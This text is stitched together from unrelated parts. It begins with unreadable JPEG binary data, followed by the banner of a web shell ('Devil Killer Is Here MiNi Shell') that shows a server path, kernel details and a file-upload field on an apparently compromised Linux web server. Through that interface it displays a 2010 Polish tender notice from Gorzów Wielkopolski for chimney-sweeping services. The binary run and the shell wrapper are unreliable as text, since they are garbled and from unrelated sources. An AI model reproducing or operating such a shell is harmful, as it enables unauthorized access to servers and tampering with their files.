JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100222/49168-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie usług kominiarskich w budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej - Administracje Domów Mieszkalnych nr 1 do 5.</b><br>
<b>Numer ogłoszenia: 49168 - 2010; data zamieszczenia: 22.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Wełniany Rynek 3, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7387101 (-02), faks 095 7387100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług kominiarskich w budynkach gminnych administrowanych przez Zakład Gospodarki Mieszkaniowej - Administracje Domów Mieszkalnych nr 1 do 5..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług kominiarskich w budynkach gminnych  administrowanych przez Zakład Gospodarki Mieszkaniowej - Administracje Domów Mieszkalnych nr 1 do 5. 
Zgodnie z dyspozycją  art. 61 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.), właściciel lub zarządca obiektu budowlanego jest obowiązany utrzymywać i użytkować obiekt zgodnie  z zasadami, o których mowa w art. 5 ust. 2  oraz art. 62 cytowanej wyżej ustawy. 
  Przedmiot zamówienia podzielony został na VI zadań (rejonów).
Lp.	ADM	Zadanie 	Przewody
			S	D	W
1.	nr 1	Z-I	39	40	290
2.	nr 1	Z-II	10	28	57
3.	nr 2	Z-III	138	553	583
4.	nr 3	Z-IV	47	143	90
5.	nr 4	Z-V	119	277	939
6.	nr 5	Z-VI	47	56	644

	
	                     400	1097	 2603


Objaśnienie :
D  - przewody dymowe
S  - przewody spalinowe
W - przewody wentylacyjne
W załączeniu wykazy budynków przypisanych każdemu z rejonów wg załączników  nr 1A - 1F do projektu umowy.  

USŁUGI  STAŁE
Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie a  w szczególności :
Do obowiązków  Wykonawcy  należy świadczenie :
Usług kominiarskich stałych , które  obejmują :
1.Czyszczenie przewodów kominowych, dymowych, spalinowych, wentylacyjnych, czopuchów, kanałów połączeniowych, itp.
-od palenisk opalanych paliwem stałym                             - 4 razy w roku    ---od palenisk opalanych paliwem ciekłym lub gazowym            - 2 razy w roku    
-od przewodów wentylacyjnych       - 1  raz w roku  ,  jeżeli większa częstotliwość nie wynika z warunków użytkowych
Uwaga!  
Częstotliwość okresowego czyszczenia przewodów kominowych wynika z § 30 rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia 2006r w sprawie ochrony przeciwpożarowej budynków , innych obiektów i terenów ( Dz.U. Nr  80, poz. 563 )
2. Usługa czyszczenia kanałów kominowych winna  być wykonana  przy pomocy :
- kompletu linowego ze szczotkami dopasowanymi do przekroju przewodów kominowych,
- przepychacza (gurówki) ze szczotkami dopasowanymi do przekroju przewodu kominowego.
3. Czyszczenie przewodów kominowych powinno  być zakończone wybraniem sadzy z przewodu kominowego   i wyniesieniem  jej z budynku. Wybieranie sadzy ze spadu  kominowego winno być wykonywane przy użyciu gracy do wybierania sadzy   i niepalnego worka kominiarskiego.
 Realizacja czynności dot. usług stałych, powinna przebiegać z częstotliwością wynikającą z cytowanych przepisów oraz w oparciu o opracowany przez Wykonawcę harmonogram czyszczeń i kontroli.
4. Ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny) obejmująca :
       
-Sprawdzenie wykonania zaleceń wynikających z poprzedniej kontroli okresowej 
-Sprawdzenie stanu technicznego elementów budynku objętych kontrolą ( w tym: 
 kominów ich przewodów, czopuchów, odgałęzień, głowic i nasad kominowych, drzwiczek wycierowych i rewizyjnych).   
-Sprawdzenie prawidłowości funkcjonowania przewodów poprzez sprawdzenie ich drożności, prawidłowego ciągu kominowego, oraz prawidłowości podłączeń urządzeń (w tym wyposażenia we wkłady kominowe przewodów kominowych odprowadzających spaliny z urządzeń grzewczych gazowych- zgodnie z wymogami prawa ) i kratek wentylacyjnych do przewodów kominowych 
-Sprawdzenie prawidłowości i stanu technicznego wyposażenia budynków to jest : 
włazy dachowe, ławy kominiarskie, drabiny itp. zapewniającego dogodny dostęp w celu wykonania  czynności stałej obsługi.
-Sprawdzenie przestrzegania przepisów ppoż, w zakresie białkowania kominów i składowania na strychach materiałów  łatwopalnych. 
-Występowania innych stwierdzonych w trakcie kontroli uszkodzeń i nieprawidłowości mogących spowodować zagrożenie bezpieczeństwa ludzi, uszkodzeń mienia.
-Sporządzenie protokołu pokontrolnego  wraz z uwzględnieniem wytycznych.
Roczna okresowa kontrola stanu technicznego sprawności przewodów kominowych i podłączeń w obsługiwanych budynkach (wartość za usługę nie może przekroczyć 50% wartości usług stałych).

-Przeprowadzenie kontroli okresowej przewodów kominowych pod kątem przygotowania :
a)Sezonu grzewczego  kotłowni lokalnych. 
b)Sprawdzenie drożności, prawidłowego ciągu kominowego, prawidłowo działających wentylacji nawiewnej i wywiewnej itp.
Uwaga !
Na okoliczność wykonania :
- przeglądu, winien być sporządzony protokół kontroli, zawierający w szczególności elementy wymienione w §  4 pkt,. 4 i 5 rozporządzenia Ministra Spraw wewnętrznych z dnia 16 sierpnia 1999r w sprawie warunków technicznych użytkowania budynków mieszkalnych ( Dz. U. z 1999 Nr 74, poz. 836 ze zm.)
Protokół z kontroli stanowił będzie  załącznik do książki obiektu budowlanego.
- czyszczeń przewodów kominowych,  winien być dokonany wpis do książki kominiarskiej.
Powyższe usługi kominiarskie wynikają z  art. 62 ust. 1 pkt. 1 lit. c z dnia 07.07.1994r. Prawo Budowlane. ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.)
Kontrolę stanu technicznego przewodów kominowych winny przeprowadzać osoby posiadające odpowiednie kwalifikacje, wynikające z postanowień art. 62 ust. 6  ustawy Prawo Budowlane. 

5.Sporządzanie opinii kominiarskich (mi.) pod potrzeby :
-    dokumentacji technicznej,
-    lokali remontowanych z (ruchu ludności)
-    projektów związanych z  wymianą instalacji gazowych

6.Usługi dodatkowe objęte zamówieniem 
-Sprawdzenie stanu technicznego przewodów kominowych  i kanałów w stanie surowym, wykończeniowym i użytkowym w budynkach nowobudowanych, przebudowywanych i modernizowanych wraz z wydaniem pisemnych opinii kominiarskich 
-Ustalenie przyczyny wadliwego działania urządzeń grzewczych odprowadzających  spaliny z wydaniem ekspertyzy zawierającej wskazania rozwiązań technicznych 
-Ustalenie przyczyny wadliwego działania  wentylacji  w lokalach , a w tym braku  prawidłowej cyrkulacji  powietrza wraz z wydaniem   ekspertyzy  zawierającej wskazania rozwiązań technicznych 
-Przeprowadzenie inwentaryzacji urządzeń grzewczo-kominowych, w budynkach łącznie ze sporządzeniem niezbędnych  szkiców i rysunków oraz opisem stanu technicznego 
-Odgruzowanie przewodu kominowego przy użyciu kamery inspekcyjnej 
-Usuwanie gniazd ptasich 
-Badania przewodu kominowego przy użyciu kamery inspekcyjnej                                                       
-Wymiana lub osadzenie drzwiczek kominowych wraz z materiałami.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających gdy zaistnieje uzasadniona  potrzeba związana z  powtórzeniem tego samego rodzaju zamówień.Zamówienia uzupełniające udzielone zostaną wykonawcy realizującemu zamówienie podstawowe po przeprowadzeniu negocjacji. 
Wartość zamówienia uzupełniającego nie przekraczy 50 % wartości realizowanego zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4, 71.35.61.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać wykonanie, (a w przypadku świadczeń okresowych lub ciągłych również wykonywanych), usług objętych przedmiotem zamówienia, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług , z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże wykonanie min. 1 usługi   w zakresie objętym przedmiotem zamówienia .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia  powyższego warunku Wykonawca obowiązany jest wykazać osoby i podmiotów, które będą uczestniczyć w wykonywaniu  zamówienia, w szczególności odpowiedzialnych za  świadczenie usługi objętej przedmiotem zamówienia  wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych dla wykonania zamówienia,  a także zakresu wykonywanych  przez nie czynności, oraz informacją  o podstawie  do dysponowania tymi osobami.
W tym celu Wykonawca winien posiadać uprawnienia kominiarskie do prowadzenia działalności zgodnej  z przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku należy wykazać posiadanie polisy OC w zakresie prowadzonej działalności z sumą ubezpieczenia nie mniejszą niż 30 %  ceny netto oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony formularz oferty /zał. nr 1/wraz  z oświadczeniem, o :
-zdolności  do wykonania zamówienia na podstawie art. 22 ust. 1 u Pzp, tym samym spełnieniu warunków określonych w siwz, 
-braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa  w art. 24 ust. 1u Pzp,
oraz że:
-zapoznał się z treścią załączonego wzoru umowy i  akceptuje  ją bez zastrzeżeń oraz zobowiązania się w przypadku wyboru, do jej zawarcia w miejscu i terminie wyznaczonym przez zamawiającego i na  potwierdzenie załącza do oferty podpisany projekt umowy .
2. oryginał pełnomocnictwa podpisany przez ustanowionych przedstawicieli Wykonawcy- dotyczy Wykonawców reprezentowanych przez pełnomocnika oraz Wykonawców składających wspólną ofertę  ( konsorcjum;spółka cywilna)                             
Uwaga !
Wymagana jest forma pisemna a pełnomocnictwo winno określać rodzaj  czynności do których pełnomocnik jest umocowany do reprezentowania w przedmiotowym postępowaniu  (w szczególności do  podpisania oferty) albo do reprezentowania w przedmiotowym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3. Oświadczenie o zdolności do wykonania zamówienia publicznego na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (załącznik nr 4 do SIWZ).
4. Oświadczenie o braku podstaw do wykluczenia z powodu nie spełniania warunków, o których mowa  w art. 24 ust. 1 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. ( załącznik nr 5  do SIWZ)
6. Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym , osobach zdolnych do wykonania zamówienia lub środków finansowych wraz z pisemnym  oświadczeniem  o  braku podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków,  o których mowa   w art. 24 ust. 1u Pzp.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość  modyfikacji  postanowień umowy w sytuacji zmiany stotnej, tj.   : 
a)   ilości czyszczonych przewodów kominowych w trakcie trwania umowy, z przyczyn niezależnych od Zamawiającego
b)    osoby wymienionej w § 6 umowy 
2. Dopuszczalne  będą zmiany nieistotne, uznane za tożsame , tzn. takie, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynie na krąg podmiotów ubiegających się o to zamówienie lub wynik postępowania. 
3. Modyfikacje i uzupełnienia  w treści niniejszej umowy będzie dokonywana wyłącznie w formie pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgm.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Mieszkaniowej
ul. Wełniany Rynek 3
66-400 Gorzów Wlkp.,pok.19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2010 godzina 10:00, miejsce: siedziba zamawiającego (sekretariat), pok.12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I-ADM 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie ,a w szczególności :
-stałe usług kominiarskie,
-ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny) 
-przeprowadzenie kontroli okresowej przewodów kominowych 
-sporządzanie opinii kominiarskich,
-usługi objęte zamówieniem , wyspecyfikowane w pkt. 3.5 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II-ADM 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie, a  w szczególności :
-stałe usług kominiarskie,
-ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny),
-przeprowadzenie kontroli okresowej przewodów kominowych,
 sporządzanie opinii kominiarskich,
-usługi objęte zamówieniem , wyspecyfikowane w pkt. 3.5 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-0, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III-ADM 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie, a w szczególności :
-stałe usług kominiarskie,
-ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny), 
-przeprowadzenie kontroli okresowej przewodów kominowych, 
-sporządzanie opinii kominiarskich,
